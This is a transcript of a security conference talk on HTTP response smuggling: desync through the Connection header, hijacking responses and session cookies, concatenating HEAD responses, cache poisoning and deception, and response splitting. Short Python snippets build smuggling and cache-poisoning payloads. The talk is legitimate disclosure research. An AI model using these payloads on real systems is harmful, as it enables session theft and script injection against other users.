- Hello. My name is Martin Doyhenard. I’m a security researcher at the Onapsis Labs.
00:07 - And today I’m going to present a new set of techniques that can be used to obtain control over the response queue in a persistent connection by exploiting different HTTP desynchronization vulnerabilities.
00:20 - The agenda for today. First, I’m going to make a quick recap on HTTP request smuggling.
00:26 - And even though I expect most of you already know what request smuggling is, I’m still going to make a quick introduction.
00:32 - And then we’ll also talk about desynchronization variants, and about one in particular that will be used through the rest of the presentation for both demos and examples.
00:43 - After this introduction, I’m going to explain what is response smuggling and how to use it for different malicious purposes.
00:50 - And I will show how to hijack responses and requests from a persistent connection, and how to obtain reliable results in real systems.
00:59 - Next, I’m going to demonstrate how to concatenate multiple responses and build malicious payloads to take control of the victim’s browser. And using this, I will demonstrate how to poison the whole cache of an HTTP proxy, by storing a crafted message as the response of any endpoint the attacker wants.
01:17 - Finally, I’ll explain how to split responses and inject arbitrary messages that will be stored in the response queue and will be delivered back to other clients by the proxy.
01:32 - So, request smuggling is an attack introduced in 2005 by Watchfire which abuses the differences between a front end and a back end server.
01:42 - These differences are related to the way the HTTP parser calculates the body length of our request.
01:47 - The idea is that the attacker sends a request containing multiple message-length headers, such as Content-Length or different transfer encodings.
01:58 - And if the front end calculates the length of the body using a different header, then it will be possible to split the request and inject the prefix for the next message.
02:10 - Let’s see an example of this in which two content-length headers are sent in the same request.
02:17 - In this example, the proxy will only use the first Content-Length if multiple headers with the same name are sent.
02:24 - And the back end will instead only use the last content-length to calculate the body size.
02:30 - When the attacker sends this request, the front end will forward the entire message, as it will think that the body is 32 bytes.
02:39 - However, when this message reaches the back end, only the first five bytes of the body will be considered to be part of the request.
02:46 - The extra 27 bytes will be split and used as the prefix of the next request processed by the back end.
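As a rough illustration, the parser discrepancy above can be simulated in a few lines of Python (a sketch, not real server code; the header names and byte counts follow the example on the slide):

```python
# Front end honors the FIRST Content-Length, back end the LAST (as in the
# example above); the leftover bytes become the next request's prefix.

def body_length(headers: list[str], pick: str) -> int:
    """Content-Length a parser would use: 'first' or 'last' occurrence."""
    values = [int(h.split(":", 1)[1]) for h in headers
              if h.lower().startswith("content-length:")]
    return values[0] if pick == "first" else values[-1]

headers = ["Host: victim.example", "Content-Length: 32", "Content-Length: 5"]
body = b"AAAAAGET /DeleteMyAccount HTTP/1.1\r\n"[:32]   # 32 bytes on the wire

front_end_len = body_length(headers, "first")   # 32: forwards the whole body
back_end_len = body_length(headers, "last")     # 5: stops after 5 bytes

smuggled = body[back_end_len:]   # the extra 27 bytes, queued as a prefix
print(len(smuggled))             # 27
```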
02:53 - If a victim’s request arrives after the attacker’s, it will be concatenated to the injected prefix, causing the back end to believe that the victim issued a request to “DeleteMyAccount”, when instead it was issued to the “myAccount” endpoint.
03:10 - And, as the victim’s session cookies are also included, the application will probably delete his account.
03:16 - But also the response of this request will be sent back to the victim.
03:29 - But these attacks were forgotten for many years, as it was thought that they couldn’t be used against real systems.
03:38 - But this changed in 2019, when James Kettle revived this idea by providing a new methodology to, first, detect different desynchronization vulnerabilities; then, confirm that it is possible to use them to smuggle a request; and finally, explore and exploit the different features provided by the web application.
03:59 - What’s more, he was able to demonstrate that these techniques could be applied in many real systems, and it was possible to collect a lot of bounties from different vendors.
04:09 - Also in 2019 and 2020, many of these desynchronization variants were presented by researchers.
04:17 - These are techniques that can be used to force the discrepancy between servers by hiding messages in the headers, such as the content-length, from a specific parser.
04:26 - In most cases, this is done by placing extra special characters, such as a space or an unprintable character.
04:33 - And in this way, a server will fail to recognize the header name or the value as a valid content-length header.
04:43 - But even though these flaws can be found in many parsers, it is also possible to cause desynchronization by using a feature that is provided just by the HTTP protocol itself.
04:54 - And to understand this technique, first, I’ll explain the difference between an end-to-end and a hop-by-hop header.
05:00 - So, end-to-end headers are those that are intended to travel from the client to the back end server, and forwarded by any proxy in the middle.
05:09 - On the other hand, hop-by-hop headers are intended to travel only to the next node in the communication chain.
05:14 - And for this reason, proxies must not forward these headers, and they should be removed from the request before being forwarded.
05:21 - And one of the most interesting hop-by-hop headers defined in the HTTP RFC is the connection header.
05:29 - This directive can be used to specify connection options that could be used to establish and maintain the connection between two nodes.
05:37 - And these options must not affect other connections.
05:41 - So again, they should not be forwarded by any proxy receiving them.
05:46 - Some of the known connection options are “close” or “keep-alive”, but the protocol also allows the client to declare any custom value he wants.
05:55 - And it also allows these connection options to be used as extra headers, to give the proxy or the servers more information on how to persist the HTTP communication.
06:04 - So let’s see an example of a request containing two connection options.
06:09 - First, the client declares them as values of the Connection header, and then the two options are also declared as separate headers.
06:17 - But when a proxy forwards this request, it will remove both the option and keep-alive headers, as well as the Connection directive itself.
06:27 - But what if, instead of specifying some useless value as a connection option, we declare an end-to-end header such as Content-Length?
06:35 - When the proxy receives the request, it will consider the body to be 13 bytes, and it will forward it.
06:41 - But before it does, it will remove the Content-Length header, as it was declared as a connection option.
06:47 - So when the back end receives this, it will think that the body is empty, and it will split the message.
06:53 - This will cause the smuggled data to be used as the prefix for the next arriving request.
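A minimal sketch of that behavior, assuming a proxy that naively strips the Connection header together with every header it names (host and values are made up):

```python
def strip_hop_by_hop(headers: dict[str, str]) -> dict[str, str]:
    """Drop the Connection header plus every header it lists as an option."""
    hop = {h.strip().lower() for h in headers.get("Connection", "").split(",")}
    return {name: value for name, value in headers.items()
            if name.lower() != "connection" and name.lower() not in hop}

attacker_request = {
    "Host": "victim.example",
    "Content-Length": "13",          # the proxy reads a 13-byte body...
    "Connection": "Content-Length",  # ...then removes the header it relied on
}

forwarded = strip_hop_by_hop(attacker_request)
# The back end sees no Content-Length at all, assumes an empty body, and
# the 13 "body" bytes become the prefix of the next request in the queue.
print(forwarded)   # {'Host': 'victim.example'}
```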
07:01 - Now, this issue was reported under the Google Vulnerability Reward Program, and Google fixed it, having confirmed that it was possible to use it to smuggle requests in their public domains.
07:16 - Now let’s see how these desynchronization vulnerabilities can be leveraged to produce useful exploits in web applications.
07:24 - First, we could use request smuggling to bypass front-end controls, such as filters to forbidden endpoints.
07:29 - And this can be done by smuggling the forbidden request, which will not be seen by the proxy, and will be forwarded to the backend.
07:37 - However, this technique does not bypass authentication for most resources, and in most real applications, it will fail if the response is not received by the attacker, and if the filter is not placed in the vulnerable proxy.
07:51 - Another exploitation technique is hijacking the victim’s request, but this can only be done if the web application offers some data storage feature.
08:01 - That is, the attacker can only hijack victim information if it can be stored or retrieved, which is not that common in all applications.
08:11 - And also, in most cases, these kinds of features are only offered to authenticated users.
08:19 - So the attacker would need to have a valid account or a valid session.
08:23 - Next, we can use request smuggling to upgrade existing vulnerabilities, such as cross-site scripting.
08:29 - But in this case, the attacker will be able to distribute the payload without having to interact with the victim.
08:35 - And in this case, you will not have to force the client to trigger the attack with some action.
08:43 - The same idea could be applied to any vulnerability requiring interaction, such as an open redirect. But to improve these kinds of vulnerabilities, the attacker first needs to find another vulnerability, such as the cross-site scripting, because otherwise there will be nothing to upgrade.
09:03 - And finally, the desynchronization vulnerabilities can be used to perform different web cache attacks, such as web cache poisoning.
09:11 - And this can be done by modifying the response of a cacheable resource, by placing a prefix in the back end’s request.
09:18 - However, it is only possible to poison resources that are cacheable, and only if the proxy ignores the Cache-Control header.
09:29 - If this is not the case, then the malicious response will not be stored by the web cache, and the attack will fail.
09:36 - Some other techniques might also be possible.
09:40 - But in most cases, they require that the system provides some rather uncommon features, or has other vulnerabilities, so I’m not going to talk about them.
09:51 - So far, all the attacks we’ve seen rely on injecting a prefix into the request queue of a persistent connection.
10:04 - However, exploiting these might not be as trivial as you would like.
10:08 - There are many obstacles to successfully taking advantage of these vulnerabilities.
10:12 - So we would like to look for other options.
10:16 - But what if, instead of placing our focus on the request, we look at attacks affecting the response queue of the connection? With this in mind, I started thinking about what would happen if, instead of injecting a prefix for the next message, we smuggle a complete request that will, alone, produce an extra response.
10:35 - If this happens, the proxy will issue one request, but it will receive two different responses from the back end.
10:42 - And if a victim later sends another message to the proxy, it will be forwarded, but in this case the remaining extra response, which corresponds to the smuggled request, will be sent back to the victim.
10:56 - And as the victim’s response got desynchronized too, an attacker could then send another request to hijack the victim’s real response.
11:05 - And if this response was issued after a login message, for example, then the attacker will be able to receive sensitive information, such as the session cookies or any other session token that was intended for the victim.
11:23 - To better understand this technique, let’s see how requests and responses are associated at the proxy and at the backend.
11:31 - First, both the attacker and the victim will send a request to the front end.
11:37 - They will be stored in the request queue and forwarded to the backend server through the same connection.
11:44 - However, when the malicious payload reaches the backend, it will get split, producing two different responses.
11:51 - And now all three responses, the two that were generated by the attacker and the one generated by the victim, will go back to the proxy.
12:00 - Here, the first response would be forwarded to the attacker.
12:05 - And the second one, which corresponds to the smuggled message, would be forwarded to the victim.
12:11 - However, as the proxy only issued two requests, it will wait for a new message before it can forward the last response.
12:21 - In this case, if the attacker is able to send a new message, he will end up obtaining the victim’s response, and with it some sensitive information, such as, as we already said, the session cookies that were created after a login request.
12:43 - But what if we tried to use these techniques in real systems?
12:50 - We would find that the results we obtain are not as expected.
12:54 - And the low reliability of these attacks can make us think that they are not as useful as they sound.
13:02 - So here we can see the communication between the proxy and the backend.
13:06 - And in this capture, an attacker was trying to desynchronize the response queue, but each time a request was sent, the connection was closed by the proxy.
13:18 - This means that the attack is failing. And the reason for this is that the proxy resets the connection every time it receives an extra response.
13:30 - And therefore we cannot send extra responses before the proxy issues a new request.
13:40 - And only after a thousand requests, I was able to smuggle a single response, and actually hijack a victim’s message.
13:49 - But of course, this is not the desired or expected result.
13:53 - So why is this happening? To understand it, first let’s take a look at what’s going on under the hood.
14:03 - And to do so, I will explain one concept that was introduced in HTTP/1.1,
14:10 - and on which all the desynchronization attacks rely.
14:15 - First, remember that the biggest change between HTTP/1.0 and HTTP/1.1 is the ability to persist TCP connections and send multiple request and response pairs through the same connection.
14:28 - This means that the client is not forced anymore to close the connection after receiving a response.
14:33 - Instead, it could use it to send more messages, increasing the performance of the network.
14:38 - However, this concept is sometimes confused with another important feature that is provided by the HTTP protocol, which is the ability to pipeline different messages through the same connection.
14:56 - So, HTTP pipelining is what allows a client to send multiple requests without having to wait for previous responses.
15:05 - This means that if a client needs to send, let’s say, two requests, to the same server.
15:10 - This can be done at the same time, concatenating them through the same channel.
15:15 - And it is the job of the server or the, or the proxy, to split them and resolve each, producing the corresponding responses.
15:24 - And as we saw in previous examples, the way each request is matched with its response depends only on the order they were received and forwarded.
15:35 - The first response will correspond to the first request, following a first-in, first-out scheme.
15:43 - And that’s why we will call them request and response queues, because they will actually work as queues.
15:50 - There is no other way of matching responses with requests, such as an ID or anything like that.
15:57 - So the only way to do it is using the order in which they were issued and received.
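This FIFO matching, and how a single extra response shifts it, can be sketched with two queues (illustrative only):

```python
from collections import deque

# One smuggled request made the back end emit an extra response; because
# matching is purely positional, every later client is now off by one.
requests = deque(["attacker", "victim"])
responses = deque(["attacker-resp", "smuggled-resp", "victim-resp"])

delivered = {}
while requests:
    delivered[requests.popleft()] = responses.popleft()

print(delivered)        # the victim receives the smuggled response
print(list(responses))  # the victim's real response waits to be hijacked
```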
16:06 - But here’s the catch: most proxies won’t enforce pipelining, meaning that if two or more requests from different sources reach the proxy, they won’t be concatenated together and forwarded together to the backend server.
16:25 - Instead, they will be sent through different free TCP connections, which won’t affect each other.
16:31 - And so the attacker won’t be able to play with the victim’s connection queue, and this will prevent the attack.
16:40 - But also, future client requests reaching the server won’t go through the same connection that the attacker used previously.
16:48 - And this is because, when the extra response injected by the attacker is received by the proxy, it will be interpreted as a communication error.
16:57 - This is because the proxy did not issue any new request, and so it shouldn’t be receiving any extra response.
17:05 - If this happens, then the proxy will think that there is a problem in the communication, and will just close the connection.
17:13 - And also, when closing this connection, the extra response that was received will be discarded, and so it won’t affect any future requests.
17:24 - So what can an attacker do to solve this problem? First, to hijack a response, an attacker needs to smuggle two responses, but they cannot be sent back together to the proxy, because, as we saw, the proxy will close the connection when it sees an extra response.
17:44 - So to avoid this, a new request must be forwarded by the proxy, so when the response arrives, the connection is persisted.
17:54 - But these new requests can only be sent after the first response goes back to the proxy.
17:59 - This is because the proxy won’t forward any other request through the same connection until the request queue of this connection is free.
18:09 - So the idea will be to send a time-consuming request as this final message. This request will take some time to be processed, and the server will take some time to generate a response for it.
18:25 - And this time will be just enough for the next victim’s message to reach the proxy and enter the proxy’s request queue.
18:35 - Therefore, when the response is forwarded back, it will be sent to that client, and the attacker will now be able to send a fast request and hijack the extra response, which in this case is the response that was issued for the victim.
18:53 - It’s not necessary that this sleeper request take a lot of time.
18:56 - It is just about knowing this time, calculating the transmission time, and playing with them.
19:05 - This will allow an attacker to know the best time between payloads, and the best time that he has to wait before sending the next attack.
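The timing constraint can be stated as a back-of-the-envelope calculation (the function and the numbers are hypothetical, just to make the relationship explicit):

```python
def hijack_window(sleeper_processing_s: float, round_trip_s: float) -> float:
    """Rough window the attacker has to send the fast hijack request: the
    sleeper must still be pending when the victim's response comes back."""
    return max(0.0, sleeper_processing_s - round_trip_s)

# e.g. a sleeper endpoint taking ~2s with a ~50ms round trip
window = hijack_window(2.0, 0.05)
print(round(window, 2))   # 1.95
```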
19:16 - And, under normal conditions using different proxies and backend servers, I was able to observe huge improvements: I could actually see the requests being smuggled while the connection was persisted.
19:31 - And as you can see, the same attack using a different smuggled endpoint will give much, much better results.
19:39 - In this case, the connection was persisted for 14 requests.
19:43 - This means that the responses were desynchronized for 14 clients.
19:48 - And that is a really, really good number, if we consider that before we were only getting one in a thousand.
20:05 - And so, if we are able to inject complete requests that will produce an extra response, what would stop us from injecting multiple messages? From a technical perspective, it’s the same to smuggle 1, 2, or 10 requests, which will produce 1, 2, or 10 extra responses.
20:23 - And this will be useful for other, more complex exploits, but for now, we can see that there are some simple attacks that we can perform by leveraging these techniques.
20:49 - If we send, instead of one, many different smuggled requests that produce this payload, then we will be able to poison the next N clients.
21:04 - Also, nested requests can be used to consume resources from both the backend and the front end server, as a single request can produce multiple messages that need to be processed at the backend.
21:18 - This could consume a lot of CPU time. And as the responses must also be generated, and in some cases stored, this could also affect the memory buffers of the application.
21:35 - But we could also combine nested injections with the classic request smuggling technique.
21:42 - And if an application with a desync vulnerability allows for content reflection, even if this reflected parameter is properly encoded, it is possible to also hijack a request from the victim, instead of only a response.
21:57 - And this will be done by smuggling two different messages.
22:01 - The first one will be an HTTP request, as we already saw, whose only purpose is to desynchronize the response queue, just as I explained previously.
22:12 - And next, the second smuggled request will not be complete, and will try to reflect some data that is concatenated with it.
22:25 - This is done, as in any other request smuggling attack, by using a Content-Length that is greater than the body of the request.
22:37 - So, as always the first response will be sent back to the attacker.
22:41 - And this will allow the new victim’s request to arrive at the backend, because otherwise, as we saw, the proxy won’t forward the request through the TCP connection.
22:55 - After this, the sleeper request will get resolved and the response will be forwarded to the victim.
23:03 - Now, as this last smuggled request contained a large Content-Length, it will use the victim’s request as part of its body, but it will still need more data.
23:16 - And as the connection is idle, the attacker can now send a large request that completes the body, causing the response containing the victim’s request as reflected data to be sent back to the attacker.
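A sketch of the byte accounting behind this hijack (the path, cookie, and lengths are invented for illustration):

```python
declared_len = 200                 # Content-Length of the incomplete request
sent_body = b"data="               # only 5 of the 200 declared bytes are sent

victim_request = (b"GET /account HTTP/1.1\r\n"
                  b"Cookie: session=S3CR3T\r\n\r\n")

# The back end keeps reading until it has 200 body bytes, so the victim's
# whole request is buffered as reflected body data...
buffered = sent_body + victim_request
still_missing = declared_len - len(buffered)

# ...and the attacker later sends `still_missing` filler bytes to complete
# the body and receive the reflection, cookies included.
print(still_missing)   # 146
```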
23:30 - So after seeing this work in a real system, I was kind of excited, but then I started wondering: is it possible to also confuse the HTTP parser when responses are sent back? Of course, we could perform the same tricks as with the desync variants, but for this, we would need to control the message-length headers of the response.
23:51 - And that’s probably not going to happen.
23:56 - However, I also started thinking: is there a difference in how the length of the body is calculated between requests and responses? And the answer, given by the HTTP RFC, is yes.
24:09 - The difference is that for some specific responses, the body must always be empty.
24:15 - And these responses are some special status codes, like the 204 and 304, but also responses that are generated out of a HEAD request.
24:28 - So what makes these kinds of responses so interesting is that not only do they depend on the request that generated them, but their headers must always be an exact replica of those of the corresponding GET response.
24:44 - So when a HEAD response is generated, the only difference from a GET response to the same endpoint is that the body will not be there; the rest of the headers should be the same.
24:56 - And this includes, of course, the content-length.
25:01 - Even though the Content-Length header is optional, it does appear in most real applications.
25:07 - And if it appears, the value will not be zero if the GET response contained a body.
25:12 - Instead, it will contain the same value, hoping that the proxy knows that the response is special and that its Content-Length should be ignored, because it’s the response to a HEAD request.
25:28 - But if the proxy fails to notice that this response was issued for a HEAD request, then what happens? The Content-Length will be used, and it will indicate a wrong value, because the HEAD response contains no body yet carries a Content-Length header with a value different from zero.
25:56 - A desynchronization will cause requests and responses to not be properly matched by the proxy.
26:01 - It will be possible to use a smuggled HEAD request to generate a malicious response.
26:06 - This will contain a Content-Length header, which in this case will be considered to contain the actual size of the body.
26:13 - If an attacker smuggles two requests to the backend, the first response, generated by the carrier message, will go back to him.
26:26 - Next, another request will arrive to the proxy and it will be forwarded to the backend.
26:32 - Now the back end will send the first response, which in this case corresponds to a HEAD request.
26:39 - When this message is received by the proxy, it won’t be forwarded right away.
26:44 - This is because the content-length header states that the body is not empty.
26:47 - And the request matching this response used the GET method, not the HEAD method.
26:54 - This means that, although the body of the response is empty, the Content-Length states that it shouldn’t be, so the proxy will wait for more data before forwarding this response.
27:09 - So when the next response arrives to the proxy, it will be used as part of the body of the previous message.
27:16 - This will then be delivered back to the client which issued the second request.
27:22 - And the remainder of the response will be sent back to the next client issuing a request.
27:28 - But that’s only if the proxy thinks this is a valid HTTP message, which in this case it is not.
27:37 - To understand these ideas, let’s see how the different HTTP messages travel through the connection.
27:44 - First the attacker would send its request to the proxy, which will forward it to the backend server.
27:52 - There, the message will be split into three and the first response will be sent back to the attacker, as always.
27:58 - After this, the victim will issue a new request, in this case, a GET request, but it could also be any other, except for the HEAD one.
28:08 - Their request will also be forwarded to the backend server.
28:12 - And when the smuggled response arrives at the proxy, the two will be concatenated together and sent back to the victim.
28:20 - If the remainder of the split response is not a valid response, then the connection will be closed, and the extra response will be discarded.
28:29 - And that is because the proxy will think that, again, there was a communication error.
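The parsing confusion itself can be reproduced in isolation. Below, a mocked proxy trusts the Content-Length of what is really a HEAD response and swallows the next response on the wire as its body (the 302 with a reflected script tag is an assumed example, mirroring the redirect feature used in the demo):

```python
# The smuggled response that should be delivered on its own: a redirect
# whose Location header reflects attacker-controlled data.
next_resp = (b"HTTP/1.1 302 Found\r\n"
             b"Location: /?q=<script>alert(1)</script>\r\n\r\n")

# A HEAD response: the headers of its GET twin, including the non-zero
# Content-Length, but no body actually follows on the wire.
head_resp = ("HTTP/1.1 200 OK\r\n"
             "Content-Type: text/html\r\n"
             f"Content-Length: {len(next_resp)}\r\n\r\n").encode()

stream = head_resp + next_resp   # what the proxy reads back to back

header_end = stream.index(b"\r\n\r\n") + 4
body = stream[header_end:header_end + len(next_resp)]  # proxy "completes" the body

print(body == next_resp)   # True: the second response became HTML body data
```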
28:35 - But why would it be useful to concatenate multiple responses? We were already able to control the response queue and the responses that the victims were receiving.
28:46 - So anything that we can concatenate, we could also have sent with a single request.
28:53 - Is that right? Well, not really. And this is because, when we concatenate two responses, one of them will have its headers used as the body of the previous message.
29:05 - This means that if data is reflected in the headers, which is rather common in most applications, let’s think of a redirect or anything that allows an attacker to reflect some data in the headers of the response,
29:22 - then an attacker will be able to reflect it in the body of the response.
29:28 - And if the headers contain a specific Content-Type directive, such as text/html, then this reflected content that was present in the headers will now be considered HTML data.
29:55 - And of course this will be executed in the client’s browser.
30:00 - And the same applies to any parameter reflected in a non-scriptable content type.
30:05 - So if we are able to reflect some content in, let’s say, the plain-text type, then we can convert it to another content type by using different headers to change how the altered response is interpreted.
30:24 - And of course, this effect can be combined with other techniques to reflect other requests and responses in the message body.
30:36 - So now we will see a demo. I was able to prove all these techniques in three major vendors, but unfortunately, they were not able to fix the issues at the time of this presentation.
30:48 - So to solve this problem, I deployed a small testing lab using a (indistinct) version as the front end, and the latest nginx version as the backend server.
31:04 - In this case, the (indistinct) HTTP parser is vulnerable to the desync variant that I explained previously, the connection desync variant, so it will be possible to smuggle a request using the Connection header to hide the Content-Length.
31:20 - First, we can see that the web application consists of three endpoints, all with almost static responses.
31:27 - The paths are /home and /helloSmuggle, and any other path with any other string will redirect to the homepage.
31:40 - Here, we can see this in the Burp Repeater window.
31:47 - If I send the helloSmuggle request with the GET method, we can see that the response contains a Content-Length header, and a Content-Type header saying that the body should be treated as an HTML document.
32:00 - The same headers, with the same values, are obtained if a HEAD request is sent,
32:08 - just as expected by the HTTP RFC specification.
32:14 - Also, we can see the behavior of the redirect feature (indistinct), reflecting the query string in the Location header.
32:30 - So now, using Turbo Intruder, which is another great contribution from James Kettle, I will smuggle the concatenated response, which will be sent back to the victim.
32:41 - Also, consider that this demo was built using the same features found in all three mentioned vendors, and so this applies to many real systems that can be found in almost any company.
32:59 - You can see that once the attack is started, all following victim’s requests obtain the malicious response.
33:21 - But finally, if the attacker stops sending this malicious payload, then the desynchronization will conclude, and the user will see that the application works as expected.
33:43 - Still, this attack gets even worse when a web cache is available.
33:48 - Remember that request smuggling could be used to poison certain endpoints with other existing responses? Well, with response smuggling, those restrictions are gone.
34:01 - An attacker will be able to poison any endpoint he wants, and the responses used for the poisoning only require that the HEAD response contains a Cache-Control header, which will cause the message to be stored in the cache.
34:21 - And, as the attacker can send multiple pipelined requests, it is possible to poison the cache with a single payload, which will also be split by the proxy.
34:30 - And this will cause the second request to get poisoned with the response of the smuggled message.
34:38 - As an example, let’s see what happens when an attacker smuggles a cacheable HEAD request.
34:44 - As you saw, the proxy will send the first response back to the attacker.
35:05 - And finally, the next request, which was also issued by the attacker, will be responded to, this time with the concatenated message, which will force the web cache to store it for future requests.
35:18 - So, when a client requests the same resource that the attacker specified, the malicious response will be sent back without the need for any interaction, because it will be stored in the cache for this specific resource.
35:37 - Again, I believe it will help to see this in the following diagram.
35:43 - As I said, the attacker will send two pipelined requests, one containing the smuggled payload, and the other specifying the URL that will be poisoned.
35:52 - This can be any endpoint that the attacker wants, even non-existent endpoints will work.
35:57 - The request will get split by the proxy and forwarded to the backend server.
36:01 - And as you can see, the messages are pipelined from the source, so this will work, even if pipelining is not enforced or even allowed.
36:10 - In this case, the requests will still be enqueued in the same connection; the only difference is that they will be sent consecutively, not concatenated.
36:23 - Now the backend server will again split the messages and produce four isolated responses that are returned to the proxy.
36:32 - Here, both responses will go back to the attacker, but the second one will be stored in the cache for the endpoint indicated in the second pipelined request.
36:47 - So the second request that the proxy was able to recognize determines the cache key under which this response is stored.
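To make the pipelined structure concrete, here is a minimal sketch of how such a poisoning payload could be assembled. The hostname, paths, and the CL.TE desync vector (front end trusts Content-Length, back end trusts Transfer-Encoding) are illustrative assumptions, not the talk’s exact lab setup:

```python
# Illustrative sketch only: hostname, paths and the CL.TE desync vector
# are assumptions, not the exact setup used in the talk.

def build_poisoning_payload(host: bytes, cacheable: bytes, target: bytes) -> bytes:
    # Requests the *backend* will see after splitting the outer body:
    # a HEAD for a cacheable resource, then the endpoint to poison.
    smuggled = (
        b"HEAD " + cacheable + b" HTTP/1.1\r\n"
        b"Host: " + host + b"\r\n\r\n"
        b"GET " + target + b" HTTP/1.1\r\n"
        b"Host: " + host + b"\r\n\r\n"
    )
    body = b"0\r\n\r\n" + smuggled  # terminating chunk, then the smuggled bytes
    # The front end reads the whole body via Content-Length and forwards it
    # untouched; the back end stops at the "0" chunk and parses the rest as
    # two new requests on the same persistent connection.
    return (
        b"POST / HTTP/1.1\r\n"
        b"Host: " + host + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n\r\n"
        + body
    )

payload = build_poisoning_payload(b"victim.example", b"/cacheable", b"/anyEndpoint")
```

The HEAD response carries the Cache-Control header, and the response to the second smuggled request fills its declared body, so the concatenated result is what the cache ends up storing.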
37:22 - Remember that this technique can be used every time a web cache exists, as there are no extra requirements.
37:29 - Even if the cache-control header is not used, there will be at least one URL that can be used to start poisoning the cache with malicious responses.
37:38 - That is, as long as a web cache exists in any proxy of the communication chain.
37:49 - And the same thing can be used to force victims into storing their own responses in the cache.
37:56 - And if the response contains sensitive victim data, it will be placed in the cache, and later the attacker can access it through the same endpoint that the victim requested.
38:07 - This is known as web cache deception, and in this case, it can even be used to store dynamic responses, such as those that are issued from login requests.
38:19 - These will contain, among other data, session cookies or any other tokens that the victim receives in his response.
38:29 - So again, the attacker can use this to store anything, and it works as an improved cache deception attack because, as I said, dynamic information can be stored.
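A toy model may help illustrate the deception (this is not any real proxy’s code; all paths, tokens, and header values are hypothetical): the smuggled HEAD response supplies the cache headers, the victim’s own dynamic response fills its declared body, and the proxy keys the result under the attacker-chosen URL.

```python
# Toy model of the improved cache deception; all names are hypothetical.

victim_resp = (b"HTTP/1.1 200 OK\r\n"
               b"Set-Cookie: session=victim-token\r\n\r\n"
               b"Welcome back!")

head_headers = (b"HTTP/1.1 200 OK\r\n"
                b"Cache-Control: max-age=3600\r\n"  # why the proxy stores it
                b"Content-Length: %d\r\n\r\n" % len(victim_resp))

cache = {}
# The proxy pairs the concatenated message with the attacker's pipelined
# request and stores it under that attacker-chosen cache key:
cache[b"/any/static/looking/url"] = head_headers + victim_resp

# Later, the attacker simply requests the same URL and reads the
# victim's session cookie out of the cached entry.
```

Unlike classic cache deception, the cacheability here comes from the smuggled HEAD’s headers, which is why even dynamic responses can be stored.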
38:46 - Now for the second demo, I will use the same lab as in the previous example, but this time with a new endpoint that is cacheable.
38:55 - In this case, it will also be called “cacheable”.
38:58 - And this will be available in the homepage.
39:03 - As you can see, this is also a static resource, but in this case, the cache-control header is used to indicate that the response to this request should be stored by the web cache.
39:13 - In this attack, I will attempt to poison the /helloSmuggler endpoint to return a malicious script using the same redirect URL to inject the payload in the body of the HEAD response, as we already saw in the previous example.
39:27 - However, this time the HEAD response will contain the cache directive, which will cause the response to be stored for any endpoint the attacker wants.
39:37 - The same connection desync vulnerability will be leveraged to smuggle the response, and our request for the endpoint to be poisoned will be pipelined after the malicious one.
39:49 - So the last request that we are seeing is actually the request whose response will be poisoned.
40:10 - This will cause the victim’s browser to execute an eval function that opens an error message, and the same effect can be achieved on any endpoint the attacker wants.
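A hypothetical reconstruction of that poisoned cache entry might look like the following. The reflected-redirect endpoint, the paths, the content type, and the script are assumptions based on the description above, not the demo’s exact bytes:

```python
# Hypothetical reconstruction of the poisoned entry: a redirect endpoint
# is assumed to reflect the requested path into its Location header, so
# the smuggled GET's path carries the script, and that redirect response
# becomes the "body" of the cacheable HEAD response.

injected_path = b"/x<script>eval('alert(\"error\")')</script>"

redirect_resp = (b"HTTP/1.1 302 Found\r\n"
                 b"Location: " + injected_path + b"\r\n\r\n")

head_resp = (b"HTTP/1.1 200 OK\r\n"
             b"Cache-Control: max-age=3600\r\n"  # makes the entry stick
             b"Content-Type: text/html\r\n"      # assumed, so the body renders
             b"Content-Length: %d\r\n\r\n" % len(redirect_resp))

# What the cache would store for /helloSmuggler: HEAD headers plus the
# reflected redirect bytes as the body.
poisoned = head_resp + redirect_resp
```

A victim requesting /helloSmuggler would then receive this message, and the reflected script in its body would run in his browser.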
40:38 - Finally, the last exploitation technique involves using the remaining bytes of the split response as another extra message that will also be placed in the response queue.
40:48 - Exploiting this behavior is almost the same as exploiting HTTP response splitting vulnerabilities, such as those obtained from line-break header injections. In those cases, an attacker splits a response using some reflection in a header name or value, which allows him to place extra line breaks and control the boundaries of the headers.
41:11 - In this case, the idea is to use the HEAD message to split a response that contains reflected data in its body or headers.
41:22 - In this reflected data, it must be possible to include line-break characters to build a valid HTTP response.
41:30 - This is not that rare when the reflected data is inside the body, as no vulnerability is associated with that feature on its own.
41:39 - The same is not true for line breaks reflected in the headers.
41:43 - That’s why such reflections are so rare in the wild, and why it’s so rare to find HTTP response splitting vulnerabilities.
41:53 - So again, the first non-standard response will go back to the attacker, as seen in previous examples.
41:59 - And then the following request arriving to the proxy will be forwarded through the same connection.
42:06 - The backend will send back both smuggled responses, and they will be concatenated at the proxy, which will forward the first message to the client, which issued the last request.
42:18 - And in this case, the remaining bytes are also a valid HTTP response.
42:25 - They will be forwarded back to the next client which sends a request to the proxy.
42:29 - In this case, if the attacker is able to reflect line breaks, it is possible to inject an arbitrary response, controlling both the headers and the body of the message.
42:42 - However, this attack is not that easy to perform, because it requires that the proxy either stores the response, or that pipelining is allowed, and even enforced if no web cache is available.
42:55 - That’s why this kind of technique is hard to exploit, and why it is not that easy to actually exploit HTTP response splitting vulnerabilities.
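A small sketch of the splitting primitive just described, assuming an endpoint that reflects a parameter into the response body without stripping CR/LF; the padding length and the injected message are illustrative:

```python
# Sketch of response splitting through the smuggled HEAD. Assumption: an
# endpoint reflects a parameter into the body without filtering CR/LF.
# Everything past the HEAD's declared Content-Length boundary must parse
# as a complete HTTP response of its own.

padding = b"A" * 10                        # consumed as the HEAD's "body"
injected_resp = (b"HTTP/1.1 200 OK\r\n"
                 b"Content-Type: text/html\r\n"
                 b"Content-Length: 18\r\n\r\n"
                 b"<script>1</script>")    # 18 bytes, matching the header
reflected = padding + injected_resp        # the value the attacker reflects

head_body_len = len(padding)               # what the HEAD response "claims"
leftover = reflected[head_body_len:]       # extra bytes left in the queue
# The proxy treats `leftover` as the next queued response and delivers it
# to whichever client sends the next request on this connection.
```

The key constraint is the alignment: the bytes consumed as the HEAD body must end exactly where the injected status line begins.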
43:11 - So, some conclusions to finish. First, we can say that response smuggling does not rely on extra vulnerabilities or special conditions to work.
43:22 - This is because most of the requirements for the explained techniques rely on the features that the HTTP protocol offers.
43:29 - What’s more, almost no exploration phase is required, and the attacks presented in this talk can work with only a few static endpoints, such as the ones I showed in the demos.
